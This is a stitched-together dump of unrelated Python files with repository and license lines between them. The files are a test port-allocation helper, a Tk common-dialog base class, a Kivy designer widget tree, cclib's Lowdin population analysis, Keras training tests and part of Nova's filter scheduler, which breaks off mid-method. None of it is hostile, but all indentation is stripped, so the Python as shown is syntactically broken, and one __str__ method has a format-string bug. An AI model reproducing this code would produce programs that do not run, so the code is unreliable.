# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import subprocess
import os
import platform
import hosts.output as host
try:
import queue as Queue
except ImportError:
import Queue
g_ports = None # ports we can use
def PortOpen(port, address=None):
ret = False
if address is None:
address = "localhost"
address = (address, port)
try:
s = socket.create_connection(address, timeout=.5)
s.close()
ret = True
except socket.error:
s = None
ret = False
except socket.timeout:
s = None
return ret
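# e.g. PortOpen(8080) is True only when something is already listening on
# localhost:8080; setup_port_queue() below relies on "not PortOpen(port)"
# to pick free ports.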
def setup_port_queue(amount=1000):
global g_ports
if g_ports is None:
g_ports = Queue.LifoQueue()
else:
return
try:
# some docker setups don't have sbin setup correctly
new_env = os.environ.copy()
new_env['PATH'] = "/sbin:/usr/sbin:" + new_env['PATH']
if 'Darwin' == platform.system():
dmin = subprocess.check_output(
["sysctl", "net.inet.ip.portrange.first"],
env=new_env
).decode().split(":")[1].split()[0]
dmax = subprocess.check_output(
["sysctl", "net.inet.ip.portrange.last"],
env=new_env
).decode().split(":")[1].split()[0]
else:
dmin, dmax = subprocess.check_output(
["sysctl", "net.ipv4.ip_local_port_range"],
env=new_env
).decode().split("=")[1].split()
dmin = int(dmin)
dmax = int(dmax)
except:
host.WriteWarning("Unable to call sysctrl!\n Tests may fail because of bad port selection!")
return
rmin = dmin - 2000
rmax = 65536 - dmax
if rmax > amount:
# fill in ports
port = dmax + 1
while port < 65536 and g_ports.qsize() < amount:
            # queue the port only if nothing is listening on it
if not PortOpen(port):
g_ports.put(port)
port += 1
if rmin > amount and g_ports.qsize() < amount:
port = 2001
while port < dmin and g_ports.qsize() < amount:
            # queue the port only if nothing is listening on it
if not PortOpen(port):
g_ports.put(port)
port += 1
def get_port(obj, name):
'''
Get a port and set it to a variable on the object
'''
setup_port_queue()
if g_ports.qsize():
# get port
port = g_ports.get()
# assign to variable
obj.Variables[name] = port
# setup clean up step to recycle the port
obj.Setup.Lambda(func_cleanup=lambda: g_ports.put(
port), description="recycling port")
return port
# use old code
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', 0)) # bind to all interfaces on an ephemeral port
port = sock.getsockname()[1]
obj.Variables[name] = port
return port
|
apache-2.0
|
2ndy/RaspIM
|
usr/lib/python2.7/lib-tk/tkCommonDialog.py
|
193
|
1418
|
# base class for tk common dialogues
#
# this module provides a base class for accessing the common
# dialogues available in Tk 4.2 and newer. use tkFileDialog,
# tkColorChooser, and tkMessageBox to access the individual
# dialogs.
#
# written by Fredrik Lundh, May 1997
#
from Tkinter import *
class Dialog:
command = None
def __init__(self, master=None, **options):
# FIXME: should this be placed on the module level instead?
if TkVersion < 4.2:
raise TclError, "this module requires Tk 4.2 or newer"
self.master = master
self.options = options
if not master and options.get('parent'):
self.master = options['parent']
def _fixoptions(self):
pass # hook
def _fixresult(self, widget, result):
return result # hook
def show(self, **options):
# update instance options
for k, v in options.items():
self.options[k] = v
self._fixoptions()
# we need a dummy widget to properly process the options
# (at least as long as we use Tkinter 1.63)
w = Frame(self.master)
try:
s = w.tk.call(self.command, *w._options(self.options))
s = self._fixresult(w, s)
finally:
try:
# get rid of the widget
w.destroy()
except:
pass
return s
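# A minimal subclass sketch (the real concrete dialogs live in tkFileDialog,
# tkColorChooser and tkMessageBox; "_QueryColor" here is only illustrative):
#
#   class _QueryColor(Dialog):
#       command = "tk_chooseColor"
#
#   color = _QueryColor(title="Pick a color").show()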
|
gpl-2.0
|
ihidalgo/uip-prog3
|
Parciales/practicas/kivy-designer-master/designer/tree.py
|
5
|
2922
|
from kivy.uix.widget import Widget
class TreeException(Exception):
pass
class TreeNode(object):
'''TreeNode class for representing information of Widgets
'''
def __init__(self):
super(TreeNode, self).__init__()
self.parent_node = None
self.list_children = []
self.class_name = ''
self.base_class_name = ''
self.is_subclassed = False
self.widget = None
class Tree(object):
'''Tree class for saving all the information regarding widgets
'''
def __init__(self):
super(Tree, self).__init__()
self.list_root_nodes = []
def insert(self, widget, parent=None):
'''inserts a new node of widget with parent.
Returns new node on success
'''
if not isinstance(widget, Widget):
            raise TreeException('Tree accepts only Widget to be inserted')
if parent is None:
node = TreeNode()
node.widget = widget
self.list_root_nodes.append(node)
return node
if not isinstance(parent, Widget):
            raise TreeException('Tree only accepts parent to be a Widget')
parent_node = self.get_node_for_widget(parent)
node = TreeNode()
node.widget = widget
node.parent_node = parent_node
if parent_node is None:
self.list_root_nodes.append(node)
else:
parent_node.list_children.append(node)
return node
def _get_node_for_widget(self, widget, node):
if node.widget == widget:
return node
for _node in node.list_children:
node_found = self._get_node_for_widget(widget, _node)
if node_found is not None:
return node_found
return None
def get_node_for_widget(self, widget):
'''Returns node for widget, None if not found
'''
for _root in self.list_root_nodes:
node = self._get_node_for_widget(widget, _root)
if node is not None:
return node
return None
def traverse_tree(self, node=None):
'''Traverse the tree, and run traverse code for every node
'''
if node is None:
for _node in self.list_root_nodes:
self.traverse_tree(_node)
else:
# Add traverse code here
for child in node.list_children:
self.traverse_tree(child)
def delete(self, widget):
'''deletes a node of widget from the Tree.
Returns that node on deletion
'''
if not isinstance(widget, Widget):
            raise TreeException('Tree accepts only Widget to be deleted')
node = self.get_node_for_widget(widget)
if node in self.list_root_nodes:
self.list_root_nodes.remove(node)
else:
node.parent_node.list_children.remove(node)
return node
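# A minimal usage sketch (root_widget and child_widget stand in for real
# kivy Widget instances):
#
#   tree = Tree()
#   root_node = tree.insert(root_widget)              # becomes a root node
#   child_node = tree.insert(child_widget, root_widget)
#   assert tree.get_node_for_widget(child_widget) is child_node
#   tree.delete(child_widget)                         # returns child_node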
|
mit
|
nyee/RMG-Py
|
external/cclib/method/lpa.py
|
24
|
4492
|
"""
cclib (http://cclib.sf.net) is (c) 2006, the cclib development team
and licensed under the LGPL (http://www.gnu.org/copyleft/lgpl.html).
"""
__revision__ = "$Revision: 837 $"
import random
import numpy
from population import Population
class LPA(Population):
"""The Lowdin population analysis"""
def __init__(self, *args):
# Call the __init__ method of the superclass.
super(LPA, self).__init__(logname="LPA", *args)
def __str__(self):
"""Return a string representation of the object."""
return "LPA of" % (self.data)
def __repr__(self):
"""Return a representation of the object."""
return 'LPA("%s")' % (self.data)
def calculate(self, indices=None, x=0.5, fupdate=0.05):
"""Perform a calculation of Lowdin population analysis.
Inputs:
indices - list of lists containing atomic orbital indices of fragments
          x - overlap matrix exponent in wavefunction projection (x=0.5 for Lowdin)
"""
# Do we have the needed info in the parser?
if not hasattr(self.data,"mocoeffs"):
self.logger.error("Missing mocoeffs")
return False
if not (hasattr(self.data, "aooverlaps") \
or hasattr(self.data, "fooverlaps") ):
self.logger.error("Missing overlap matrix")
return False
if not hasattr(self.data, "nbasis"):
self.logger.error("Missing nbasis")
return False
if not hasattr(self.data, "homos"):
self.logger.error("Missing homos")
return False
unrestricted = (len(self.data.mocoeffs) == 2)
nbasis = self.data.nbasis
# Determine number of steps, and whether process involves beta orbitals.
self.logger.info("Creating attribute aoresults: [array[2]]")
alpha = len(self.data.mocoeffs[0])
self.aoresults = [ numpy.zeros([alpha, nbasis], "d") ]
nstep = alpha
if unrestricted:
beta = len(self.data.mocoeffs[1])
self.aoresults.append(numpy.zeros([beta, nbasis], "d"))
nstep += beta
        # initialize progress if available
if self.progress:
self.progress.initialize(nstep)
if hasattr(self.data, "aooverlaps"):
S = self.data.aooverlaps
elif hasattr(self.data, "fooverlaps"):
S = self.data.fooverlaps
# Get eigenvalues and matrix of eigenvectors for transformation decomposition (U).
        # Find roots of diagonal elements, and transform backwards using eigenvectors.
# We need two matrices here, one for S^x, another for S^(1-x).
# We don't need to invert U, since S is symmetrical.
eigenvalues, U = numpy.linalg.eig(S)
UI = U.transpose()
Sdiagroot1 = numpy.identity(len(S))*numpy.power(eigenvalues, x)
Sdiagroot2 = numpy.identity(len(S))*numpy.power(eigenvalues, 1-x)
Sroot1 = numpy.dot(U, numpy.dot(Sdiagroot1, UI))
Sroot2 = numpy.dot(U, numpy.dot(Sdiagroot2, UI))
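        # Sketch of the projection computed below: for MO i with coefficient
        # vector c_i, the population on AO mu is
        #   q[i, mu] = (c_i . S^x)[mu] * (c_i . S^(1-x))[mu]
        # which is the symmetric Lowdin partition when x = 0.5.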
step = 0
for spin in range(len(self.data.mocoeffs)):
for i in range(len(self.data.mocoeffs[spin])):
if self.progress and random.random() < fupdate:
self.progress.update(step, "Lowdin Population Analysis")
ci = self.data.mocoeffs[spin][i]
temp1 = numpy.dot(ci, Sroot1)
temp2 = numpy.dot(ci, Sroot2)
self.aoresults[spin][i] = numpy.multiply(temp1, temp2).astype("d")
step += 1
if self.progress:
self.progress.update(nstep, "Done")
retval = super(LPA, self).partition(indices)
if not retval:
self.logger.error("Error in partitioning results")
return False
# Create array for charges.
self.logger.info("Creating fragcharges: array[1]")
size = len(self.fragresults[0][0])
self.fragcharges = numpy.zeros([size], "d")
for spin in range(len(self.fragresults)):
for i in range(self.data.homos[spin] + 1):
temp = numpy.reshape(self.fragresults[spin][i], (size,))
self.fragcharges = numpy.add(self.fragcharges, temp)
if not unrestricted:
self.fragcharges = numpy.multiply(self.fragcharges, 2)
return True
if __name__ == "__main__":
import doctest, lpa
doctest.testmod(lpa, verbose=False)
|
mit
|
mengxn/tensorflow
|
tensorflow/contrib/keras/python/keras/engine/training_test.py
|
36
|
24119
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training routines."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.keras.python import keras
from tensorflow.contrib.keras.python.keras import testing_utils
from tensorflow.contrib.keras.python.keras.engine.training import _weighted_masked_objective
from tensorflow.python.platform import test
class TrainingTest(test.TestCase):
def test_fit_on_arrays(self):
with self.test_session():
a = keras.layers.Input(shape=(3,), name='input_a')
b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(4, name='dense')
c = dense(a)
d = dense(b)
e = keras.layers.Dropout(0.5, name='dropout')(c)
model = keras.models.Model([a, b], [d, e])
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1., 0.5]
metrics = ['mae']
model.compile(optimizer, loss, metrics=metrics, loss_weights=loss_weights)
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_d_np = np.random.random((10, 4))
output_e_np = np.random.random((10, 4))
# Test fit at different verbosity
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=1,
batch_size=5,
verbose=0)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=1,
batch_size=5,
verbose=1)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=2,
batch_size=5,
verbose=2)
model.train_on_batch([input_a_np, input_b_np], [output_d_np, output_e_np])
# Test with validation data
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
validation_data=([input_a_np, input_b_np], [output_d_np,
output_e_np]),
epochs=1,
batch_size=5,
verbose=0)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
validation_data=([input_a_np, input_b_np], [output_d_np,
output_e_np]),
epochs=2,
batch_size=5,
verbose=1)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
validation_data=([input_a_np, input_b_np], [output_d_np,
output_e_np]),
epochs=2,
batch_size=5,
verbose=2)
# Test with validation split
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=2,
batch_size=5,
verbose=0,
validation_split=0.2)
# Test with dictionary inputs
model.fit(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
epochs=1,
batch_size=5,
verbose=0)
model.fit(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
epochs=1,
batch_size=5,
verbose=1)
model.fit(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
validation_data=({
'input_a': input_a_np,
'input_b': input_b_np
}, {
'dense': output_d_np,
'dropout': output_e_np
}),
epochs=1,
batch_size=5,
verbose=0)
model.train_on_batch({
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np})
# Test with lists for loss, metrics
loss = ['mae', 'mse']
metrics = ['acc', 'mae']
model.compile(optimizer, loss, metrics=metrics)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=1,
batch_size=5,
verbose=0)
# Test with dictionaries for loss, metrics, loss weights
loss = {'dense': 'mse', 'dropout': 'mae'}
loss_weights = {'dense': 1., 'dropout': 0.5}
metrics = {'dense': 'mse', 'dropout': 'mae'}
model.compile(optimizer, loss, metrics=metrics, loss_weights=loss_weights)
model.fit(
[input_a_np, input_b_np], [output_d_np, output_e_np],
epochs=1,
batch_size=5,
verbose=0)
def test_evaluate_predict_on_arrays(self):
with self.test_session():
a = keras.layers.Input(shape=(3,), name='input_a')
b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(4, name='dense')
c = dense(a)
d = dense(b)
e = keras.layers.Dropout(0.5, name='dropout')(c)
model = keras.models.Model([a, b], [d, e])
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1., 0.5]
metrics = ['mae']
model.compile(
optimizer,
loss,
metrics=metrics,
loss_weights=loss_weights,
sample_weight_mode=None)
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_d_np = np.random.random((10, 4))
output_e_np = np.random.random((10, 4))
# Test evaluate at different verbosity
out = model.evaluate(
[input_a_np, input_b_np], [output_d_np, output_e_np],
batch_size=5,
verbose=0)
self.assertEqual(len(out), 5)
out = model.evaluate(
[input_a_np, input_b_np], [output_d_np, output_e_np],
batch_size=5,
verbose=1)
self.assertEqual(len(out), 5)
out = model.evaluate(
[input_a_np, input_b_np], [output_d_np, output_e_np],
batch_size=5,
verbose=2)
self.assertEqual(len(out), 5)
out = model.test_on_batch([input_a_np, input_b_np],
[output_d_np, output_e_np])
self.assertEqual(len(out), 5)
# Test evaluate with dictionary inputs
model.evaluate(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
batch_size=5,
verbose=0)
model.evaluate(
{
'input_a': input_a_np,
'input_b': input_b_np
}, {'dense': output_d_np,
'dropout': output_e_np},
batch_size=5,
verbose=1)
# Test predict
out = model.predict([input_a_np, input_b_np], batch_size=5)
self.assertEqual(len(out), 2)
out = model.predict({'input_a': input_a_np, 'input_b': input_b_np})
self.assertEqual(len(out), 2)
out = model.predict_on_batch({
'input_a': input_a_np,
'input_b': input_b_np
})
self.assertEqual(len(out), 2)
class LossWeightingTest(test.TestCase):
def test_class_weights(self):
num_classes = 5
batch_size = 5
epochs = 5
weighted_class = 3
train_samples = 1000
test_samples = 1000
input_dim = 5
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(10, input_shape=(input_dim,)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.Dense(num_classes))
model.add(keras.layers.Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=train_samples,
test_samples=test_samples,
input_shape=(input_dim,),
num_classes=num_classes)
int_y_test = y_test.copy()
int_y_train = y_train.copy()
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
test_ids = np.where(int_y_test == np.array(weighted_class))[0]
class_weight = dict([(i, 1.) for i in range(num_classes)])
class_weight[weighted_class] = 2.
sample_weight = np.ones((y_train.shape[0]))
sample_weight[int_y_train == weighted_class] = 2.
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
class_weight=class_weight,
validation_data=(x_train, y_train, sample_weight))
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 2,
verbose=0,
class_weight=class_weight)
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 2,
verbose=0,
class_weight=class_weight,
validation_split=0.1)
model.train_on_batch(
x_train[:batch_size], y_train[:batch_size], class_weight=class_weight)
ref_score = model.evaluate(x_test, y_test, verbose=0)
score = model.evaluate(
x_test[test_ids, :], y_test[test_ids, :], verbose=0)
self.assertLess(score, ref_score)
def test_sample_weights(self):
num_classes = 5
batch_size = 5
epochs = 5
weighted_class = 3
train_samples = 1000
test_samples = 1000
input_dim = 5
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(10, input_shape=(input_dim,)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.Dense(num_classes))
model.add(keras.layers.Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=train_samples,
test_samples=test_samples,
input_shape=(input_dim,),
num_classes=num_classes)
int_y_test = y_test.copy()
int_y_train = y_train.copy()
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
test_ids = np.where(int_y_test == np.array(weighted_class))[0]
class_weight = dict([(i, 1.) for i in range(num_classes)])
class_weight[weighted_class] = 2.
sample_weight = np.ones((y_train.shape[0]))
sample_weight[int_y_train == weighted_class] = 2.
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
sample_weight=sample_weight)
model.fit(
x_train,
y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
sample_weight=sample_weight,
validation_split=0.1)
model.train_on_batch(
x_train[:batch_size],
y_train[:batch_size],
sample_weight=sample_weight[:batch_size])
model.test_on_batch(
x_train[:batch_size],
y_train[:batch_size],
sample_weight=sample_weight[:batch_size])
ref_score = model.evaluate(x_test, y_test, verbose=0)
score = model.evaluate(
x_test[test_ids, :], y_test[test_ids, :], verbose=0)
self.assertLess(score, ref_score)
def test_temporal_sample_weights(self):
num_classes = 5
batch_size = 5
epochs = 5
weighted_class = 3
train_samples = 1000
test_samples = 1000
input_dim = 5
timesteps = 3
with self.test_session():
model = keras.models.Sequential()
model.add(
keras.layers.TimeDistributed(
keras.layers.Dense(num_classes),
input_shape=(timesteps, input_dim)))
model.add(keras.layers.Activation('softmax'))
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=train_samples,
test_samples=test_samples,
input_shape=(input_dim,),
num_classes=num_classes)
int_y_test = y_test.copy()
int_y_train = y_train.copy()
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
test_ids = np.where(int_y_test == np.array(weighted_class))[0]
class_weight = dict([(i, 1.) for i in range(num_classes)])
class_weight[weighted_class] = 2.
sample_weight = np.ones((y_train.shape[0]))
sample_weight[int_y_train == weighted_class] = 2.
temporal_x_train = np.reshape(x_train, (len(x_train), 1,
x_train.shape[1]))
temporal_x_train = np.repeat(temporal_x_train, timesteps, axis=1)
temporal_x_test = np.reshape(x_test, (len(x_test), 1, x_test.shape[1]))
temporal_x_test = np.repeat(temporal_x_test, timesteps, axis=1)
temporal_y_train = np.reshape(y_train, (len(y_train), 1,
y_train.shape[1]))
temporal_y_train = np.repeat(temporal_y_train, timesteps, axis=1)
temporal_y_test = np.reshape(y_test, (len(y_test), 1, y_test.shape[1]))
temporal_y_test = np.repeat(temporal_y_test, timesteps, axis=1)
temporal_sample_weight = np.reshape(sample_weight, (len(sample_weight),
1))
temporal_sample_weight = np.repeat(
temporal_sample_weight, timesteps, axis=1)
model.compile(
loss='binary_crossentropy',
optimizer='rmsprop',
sample_weight_mode='temporal')
model.fit(
temporal_x_train,
temporal_y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
sample_weight=temporal_sample_weight)
model.fit(
temporal_x_train,
temporal_y_train,
batch_size=batch_size,
epochs=epochs // 3,
verbose=0,
sample_weight=temporal_sample_weight,
validation_split=0.1)
model.train_on_batch(
temporal_x_train[:batch_size],
temporal_y_train[:batch_size],
sample_weight=temporal_sample_weight[:batch_size])
model.test_on_batch(
temporal_x_train[:batch_size],
temporal_y_train[:batch_size],
sample_weight=temporal_sample_weight[:batch_size])
ref_score = model.evaluate(temporal_x_test, temporal_y_test, verbose=0)
score = model.evaluate(
temporal_x_test[test_ids], temporal_y_test[test_ids], verbose=0)
self.assertLess(score, ref_score)
class LossMaskingTest(test.TestCase):
def test_masking(self):
with self.test_session():
np.random.seed(1337)
x = np.array([[[1], [1]], [[0], [0]]])
model = keras.models.Sequential()
model.add(keras.layers.Masking(mask_value=0, input_shape=(2, 1)))
model.add(
keras.layers.TimeDistributed(
keras.layers.Dense(1, kernel_initializer='one')))
model.compile(loss='mse', optimizer='sgd')
y = np.array([[[1], [1]], [[1], [1]]])
loss = model.train_on_batch(x, y)
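# With kernel_initializer='one' and the default zero bias, the unmasked
# sample [[1], [1]] already reproduces y exactly, and the all-zero sample
# is masked out, so the batch loss must be 0.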
self.assertEqual(loss, 0)
def test_loss_masking(self):
with self.test_session():
weighted_loss = _weighted_masked_objective(keras.losses.get('mae'))
shape = (3, 4, 2)
x = np.arange(24).reshape(shape)
y = 2 * x
# Normally the trailing 1 is added by standardize_weights
weights = np.ones((3,))
mask = np.ones((3, 4))
mask[1, 0] = 0
keras.backend.eval(
weighted_loss(
keras.backend.variable(x),
keras.backend.variable(y),
keras.backend.variable(weights), keras.backend.variable(mask)))
class TestDynamicTrainability(test.TestCase):
def test_trainable_argument(self):
with self.test_session():
x = np.random.random((5, 3))
y = np.random.random((5, 2))
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_dim=3, trainable=False))
model.compile('rmsprop', 'mse')
out = model.predict(x)
model.train_on_batch(x, y)
out_2 = model.predict(x)
self.assertAllClose(out, out_2)
# test with nesting
inputs = keras.layers.Input(shape=(3,))
output = model(inputs)
model = keras.models.Model(inputs, output)
model.compile('rmsprop', 'mse')
out = model.predict(x)
model.train_on_batch(x, y)
out_2 = model.predict(x)
self.assertAllClose(out, out_2)
def test_layer_trainability_switch(self):
with self.test_session():
# with constructor argument, in Sequential
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, trainable=False, input_dim=1))
self.assertListEqual(model.trainable_weights, [])
# by setting the `trainable` argument, in Sequential
model = keras.models.Sequential()
layer = keras.layers.Dense(2, input_dim=1)
model.add(layer)
self.assertListEqual(model.trainable_weights, layer.trainable_weights)
layer.trainable = False
self.assertListEqual(model.trainable_weights, [])
# with constructor argument, in Model
x = keras.layers.Input(shape=(1,))
y = keras.layers.Dense(2, trainable=False)(x)
model = keras.models.Model(x, y)
self.assertListEqual(model.trainable_weights, [])
# by setting the `trainable` argument, in Model
x = keras.layers.Input(shape=(1,))
layer = keras.layers.Dense(2)
y = layer(x)
model = keras.models.Model(x, y)
self.assertListEqual(model.trainable_weights, layer.trainable_weights)
layer.trainable = False
self.assertListEqual(model.trainable_weights, [])
def test_model_trainability_switch(self):
with self.test_session():
# a non-trainable model has no trainable weights
x = keras.layers.Input(shape=(1,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
model.trainable = False
self.assertListEqual(model.trainable_weights, [])
# same for Sequential
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_dim=1))
model.trainable = False
self.assertListEqual(model.trainable_weights, [])
def test_nested_model_trainability(self):
with self.test_session():
# a Sequential inside a Model
inner_model = keras.models.Sequential()
inner_model.add(keras.layers.Dense(2, input_dim=1))
x = keras.layers.Input(shape=(1,))
y = inner_model(x)
outer_model = keras.models.Model(x, y)
self.assertListEqual(outer_model.trainable_weights,
inner_model.trainable_weights)
inner_model.trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
inner_model.trainable = True
inner_model.layers[-1].trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
# a Sequential inside a Sequential
inner_model = keras.models.Sequential()
inner_model.add(keras.layers.Dense(2, input_dim=1))
outer_model = keras.models.Sequential()
outer_model.add(inner_model)
self.assertListEqual(outer_model.trainable_weights,
inner_model.trainable_weights)
inner_model.trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
inner_model.trainable = True
inner_model.layers[-1].trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
# a Model inside a Model
x = keras.layers.Input(shape=(1,))
y = keras.layers.Dense(2)(x)
inner_model = keras.models.Model(x, y)
x = keras.layers.Input(shape=(1,))
y = inner_model(x)
outer_model = keras.models.Model(x, y)
self.assertListEqual(outer_model.trainable_weights,
inner_model.trainable_weights)
inner_model.trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
inner_model.trainable = True
inner_model.layers[-1].trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
# a Model inside a Sequential
x = keras.layers.Input(shape=(1,))
y = keras.layers.Dense(2)(x)
inner_model = keras.models.Model(x, y)
outer_model = keras.models.Sequential()
outer_model.add(inner_model)
self.assertListEqual(outer_model.trainable_weights,
inner_model.trainable_weights)
inner_model.trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
inner_model.trainable = True
inner_model.layers[-1].trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
class TestGeneratorMethods(test.TestCase):
def test_generator_methods(self):
arr_data = np.random.randint(0, 256, (50, 2))
arr_labels = np.random.randint(0, 2, 50)
def custom_generator():
batch_size = 10
n_samples = 50
while True:
batch_index = np.random.randint(0, n_samples - batch_size)
start = batch_index
end = start + batch_size
x = arr_data[start: end]
y = arr_labels[start: end]
yield x, y
model = keras.models.Sequential()
model.add(keras.layers.Dense(1, input_shape=(2,)))
model.compile(loss='mse', optimizer='sgd')
model.fit_generator(custom_generator(),
steps_per_epoch=5,
epochs=1,
verbose=1,
max_q_size=10,
workers=4,
pickle_safe=True)
model.fit_generator(custom_generator(),
steps_per_epoch=5,
epochs=1,
verbose=1,
max_q_size=10,
pickle_safe=False)
model.fit_generator(custom_generator(),
steps_per_epoch=5,
epochs=1,
verbose=1,
max_q_size=10,
pickle_safe=False,
validation_data=custom_generator(),
validation_steps=10)
model.predict_generator(custom_generator(),
steps=5,
max_q_size=10,
workers=2,
pickle_safe=True)
model.predict_generator(custom_generator(),
steps=5,
max_q_size=10,
pickle_safe=False)
model.evaluate_generator(custom_generator(),
steps=5,
max_q_size=10,
workers=2,
pickle_safe=True)
model.evaluate_generator(custom_generator(),
steps=5,
max_q_size=10,
pickle_safe=False)
if __name__ == '__main__':
test.main()
|
apache-2.0
|
eneabio/nova
|
nova/scheduler/filter_scheduler.py
|
1
|
11203
|
# Copyright (c) 2011 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The FilterScheduler is for creating instances locally.
You can customize this scheduler by specifying your own Host Filters and
Weighing Functions.
"""
import operator
from nova import exception
from nova import flags
from nova import log as logging
from nova.notifier import api as notifier
from nova.scheduler import driver
from nova.scheduler import least_cost
from nova.scheduler import scheduler_options
from nova.scheduler import api
from nova import utils
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
class FilterScheduler(driver.Scheduler):
"""Scheduler that can be used for filtering and weighing."""
def __init__(self, *args, **kwargs):
super(FilterScheduler, self).__init__(*args, **kwargs)
self.cost_function_cache = {}
self.options = scheduler_options.SchedulerOptions()
def schedule(self, context, topic, method, *args, **kwargs):
"""The schedule() contract requires we return the one
best-suited host for this request.
NOTE: We're only focused on compute instances right now,
so this method will always raise NoValidHost()."""
msg = _("No host selection for %s defined.") % topic
raise exception.NoValidHost(reason=msg)
def schedule_run_instance(self, context, request_spec, *args, **kwargs):
"""This method is called from nova.compute.api to provision
an instance. We first create a build plan (a list of WeightedHosts)
and then provision.
Returns a list of the instances created.
"""
elevated = context.elevated()
num_instances = request_spec.get('num_instances', 1)
LOG.debug(_("Attempting to build %(num_instances)d instance(s)") %
locals())
payload = dict(request_spec=request_spec)
notifier.notify(notifier.publisher_id("scheduler"),
'scheduler.run_instance.start', notifier.INFO, payload)
weighted_hosts = self._schedule(context, "compute", request_spec,
*args, **kwargs)
if not weighted_hosts:
raise exception.NoValidHost(reason="")
# NOTE(comstud): Make sure we do not pass this through. It
# contains an instance of RpcContext that cannot be serialized.
kwargs.pop('filter_properties', None)
instances = []
for num in xrange(num_instances):
if not weighted_hosts:
break
weighted_host = weighted_hosts.pop(0)
request_spec['instance_properties']['launch_index'] = num
instance = self._provision_resource(elevated, weighted_host,
request_spec, kwargs)
if instance:
instances.append(instance)
notifier.notify(notifier.publisher_id("scheduler"),
'scheduler.run_instance.end', notifier.INFO, payload)
return instances
def schedule_prep_resize(self, context, request_spec, *args, **kwargs):
"""Select a target for resize.
Selects a target host for the instance, post-resize, and casts
the prep_resize operation to it.
"""
hosts = self._schedule(context, 'compute', request_spec,
*args, **kwargs)
if not hosts:
raise exception.NoValidHost(reason="")
host = hosts.pop(0)
# NOTE(comstud): Make sure we do not pass this through. It
# contains an instance of RpcContext that cannot be serialized.
kwargs.pop('filter_properties', None)
# Forward off to the host
